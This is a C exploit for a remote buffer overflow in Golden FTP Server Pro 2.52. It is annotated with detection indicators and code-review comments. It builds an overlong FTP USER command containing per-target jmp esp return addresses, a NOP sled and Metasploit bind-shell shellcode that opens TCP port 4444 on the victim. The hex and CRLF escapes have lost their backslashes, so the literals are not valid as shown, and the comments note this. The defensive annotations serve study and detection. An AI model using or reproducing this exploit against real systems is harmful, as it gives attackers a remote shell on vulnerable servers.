# Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
# Published : 2005-04-29
# Author : ATmaCA
/*
*
* Golden FTP Server Pro Remote Buffer Overflow Exploit
* Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and metasploit
* Usage: exploit <targetOs> <targetIp>
*
*/
/*
*
* Vulnerable Versions:
* Golden FTP Server Pro v2.52
*
* Exploit:
* Run the exploit against the server. Afterward, right
* click on the Golden FTP Server Pro icon in the Windows tray and click
* Statistic.
* It will open a bind shell on port 4444
*
*/
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
/*
 * FTP USER command whose argument is a long run of 'A' filler (a few hundred
 * bytes across the eight string pieces).  This is the overflow trigger: the
 * username is presumably copied by the server into a fixed-size buffer
 * (vulnerable build per the header: Golden FTP Server Pro v2.52); the server
 * side is not shown here.  main() appends the return address, NOP sled and
 * payload directly after this filler.
 *
 * Detection note: the filler is not encoded, so a USER argument of this length
 * on TCP/21 is the simplest wire-level indicator for this attempt; legitimate
 * usernames are far shorter.
 */
char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
/*
 * Per-target return address, selected by <targetOs> in main().  The author's
 * comments label each entry as a "jmp esp" address for one Windows XP English
 * service pack; nothing in this listing verifies those values.  Only two
 * entries exist, and main() indexes this array with atoi(argv[1]) - 1 without
 * a range check (see the note there).
 *
 * Rendering caveat: the hex escapes appear as "xFC" etc. with no backslash,
 * so as shown each entry is a 12-character string, not 4 bytes.  The
 * pointers should also be const (string literals are read-only).
 */
char *target[]= //return addr
{
"xFCx18xD7x77", //WinXp Sp1 Eng - jmp esp addr
"xBFxACxDAx77" //WinXp Sp2 Eng - jmp esp addr
};
/*
 * Payload as described by the embedded Metasploit header: win32_bind with
 * LPORT=4444, 348 bytes, PexFnstenvSub encoder.  The row count matches the
 * stated size (21 rows of 16 byte escapes plus one of 12 = 348).  Because the
 * bytes are encoder output, the raw payload is not a stable signature; the
 * long USER argument (see userreq) and the post-exploitation listener on
 * TCP/4444 are the more reliable indicators.
 *
 * Rendering caveat: as on the other literals in this listing, the "\x"
 * escapes have lost their backslashes, so the bytes shown here are not the
 * bytes the author's build would emit.
 */
char shellcode[] =
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
"x31xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x82"
"x2ax64x94x83xebxfcxe2xf4x7ex40x8fxdbx6axd3x9bx6b"
"x7dx4axefxf8xa6x0exefxd1xbexa1x18x91xfax2bx8bx1f"
"xcdx32xefxcbxa2x2bx8fx77xb2x63xefxa0x09x2bx8axa5"
"x42xb3xc8x10x42x5ex63x55x48x27x65x56x69xdex5fxc0"
"xa6x02x11x77x09x75x40x95x69x4cxefx98xc9xa1x3bx88"
"x83xc1x67xb8x09xa3x08xb0x9ex4bxa7xa5x42x4exefxd4"
"xb2xa1x24x98x09x5ax78x39x09x6ax6cxcaxeaxa4x2ax9a"
"x6ex7ax9bx42xb3xf1x02xc7xe4x42x57xa6xeax5dx17xa6"
"xddx7ex9bx44xeaxe1x89x68xb9x7ax9bx42xddxa3x81xf2"
"x03xc7x6cx96xd7x40x66x6bx52x42xbdx9dx77x87x33x6b"
"x54x79x37xc7xd1x79x27xc7xc1x79x9bx44xe4x42x75xc8"
"xe4x79xedx75x17x42xc0x8exf2xedx33x6bx54x40x74xc5"
"xd7xd5xb4xfcx26x87x4ax7dxd5xd5xb2xc7xd7xd5xb4xfc"
"x67x63xe2xddxd5xd5xb2xc4xd6x7ex31x6bx52xb9x0cx73"
"xfbxecx1dxc3x7dxfcx31x6bx52x4cx0exf0xe4x42x07xf9"
"x0bxcfx0exc4xdbx03xa8x1dx65x40x20x1dx60x1bxa4x67"
"x28xd4x26xb9x7cx68x48x07x0fx50x5cx3fx29x81x0cxe6"
"x7cx99x72x6bxf7x6ex9bx42xd9x7dx36xc5xd3x7bx0ex95"
"xd3x7bx31xc5x7dxfax0cx39x5bx2fxaaxc7x7dxfcx0ex6b"
"x7dx1dx9bx44x09x7dx98x17x46x4ex9bx42xd0xd5xb4xfc"
"x72xa0x60xcbxd1xd5xb2x6bx52x2ax64x94";
/*
 * 24-entry sled of 0x90 (x86 NOP); main() places it between the return
 * address and the payload.  Same rendering caveat as the other literals:
 * the "x90" escapes are missing their backslashes in this listing.
 */
char nops[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90";
/*
 * PASS command with an empty password, appended after the USER line so the
 * whole login exchange goes out in one send().  As rendered, "rn" stands
 * where the CRLF escape was.
 */
char passreq[] =
"PASS rn";
/*
 * Exploit driver.  Connects to <targetIp>:21, discards the banner, then sends
 * a single buffer: userreq + target[<targetOs>-1] + nops + shellcode + CRLF +
 * passreq.  Per the file header the payload is a bind shell on TCP/4444 that
 * becomes reachable once the server's Statistic window is opened.
 *
 * Defender's view of the artifacts this produces (all visible below):
 *   - one FTP USER command whose argument is several hundred bytes long
 *     (filler + address + NOP sled + 348-byte payload), sent as one segment
 *     immediately after the banner;
 *   - afterwards a new listener on TCP/4444 on the server host.
 *
 * Code-quality issues in this listing, left as written and flagged inline:
 *   - `void main` is non-standard; the return type must be int.
 *   - targetnum is used as an array index without a range check.
 *   - malloc() is unchecked and evilbuf is never freed.
 *   - exit(1) paths skip closesocket()/WSACleanup() (best-effort cleanup).
 *   - The "\x.." and "\r\n" escapes appear to have lost their backslashes in
 *     this rendering ("x90", "rn"), so the literals shown are not the bytes
 *     the author's build would have sent.
 */
void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock; /* never zeroed; sin_zero is left uninitialised */
SOCKET mysocket;
char rec[1024]; /* banner scratch; its contents are never examined */
if (argc < 3)
{
/* argv[0] is passed but the format has no conversion for it (-Wformat-extra-args); harmless. */
printf("rnGolden FTP Server Pro Remote Buffer Overflow Exploitrn",argv[0]);
printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)rn");
printf("Exploit coded By ATmaCArn");
printf("Web: atmacasoft.com && spyinstructors.comrn");
printf("Credit to kozan and metasploitrn");
printf("Usage:rnexploit <targetOs> <targetIp>rnrn",argv[0]);
printf("Targets:n");
printf("1 - WinXP SP1 englishn");
printf("2 - WinXP SP2 englishn");
printf("Example:exploit 2 127.0.0.1n");
return;
}
/* BUG: target[] has two entries, but targetnum is not range-checked.  Any
 * <targetOs> other than 1 or 2 indexes outside the array (undefined
 * behaviour); non-numeric input makes atoi() return 0, i.e. targetnum == -1.
 * strtol() with an explicit 1..2 check would be the fix. */
int targetnum = atoi(argv[1]) - 1;
/* Each sizeof counts the array's NUL terminator, and +7 is meant to cover
 * the 4-byte return address, the CRLF separator and the final NUL.  The
 * result is unchecked: strcpy() below dereferences NULL if malloc() fails. */
char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
+sizeof(passreq)+7);
strcpy(evilbuf,userreq);
strcat(evilbuf,target[targetnum]);
strcat(evilbuf,nops);
strcat(evilbuf,shellcode);
strcat(evilbuf,"rn");
strcat(evilbuf,passreq);
//printf("%s",evilbuf);
wVersionRequested = MAKEWORD(1, 1);
/* WSAStartup() returns 0 on success or a positive WSAE* code on failure, so
 * the "< 0" test never fires; a failure falls through to socket(). */
if (WSAStartup(wVersionRequested, &wsaData) < 0) return;
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET){
printf("Socket error!rn");
exit(1);
}
printf("Resolving Hostnames...n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
/* The message prints argv[1] (the OS number) although argv[2] was resolved. */
printf("Resolve of %s failedn", argv[1]);
exit(1);
}
/* Copies h_length bytes into the 4-byte s_addr; correct for AF_INET results,
 * which is all gethostbyname() returns. */
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(21);
printf("Connecting...n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Couldn't connect to host.n");
exit(1);
}
printf("Connected!...n");
printf("Waiting for welcome message...n");
Sleep(10);
/* Banner read: the return value is ignored and rec is never NUL-terminated,
 * which is tolerable only because rec is never read. */
recv(mysocket,rec,1024,0);
printf("Sending evil request...n");
/* strlen()+1 also transmits the terminating NUL byte after PASS. */
if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
printf("Error Sending evil request.rn");
closesocket(mysocket);
exit(1);
}
Sleep(10);
printf("Success.n");
closesocket(mysocket);
WSACleanup();
}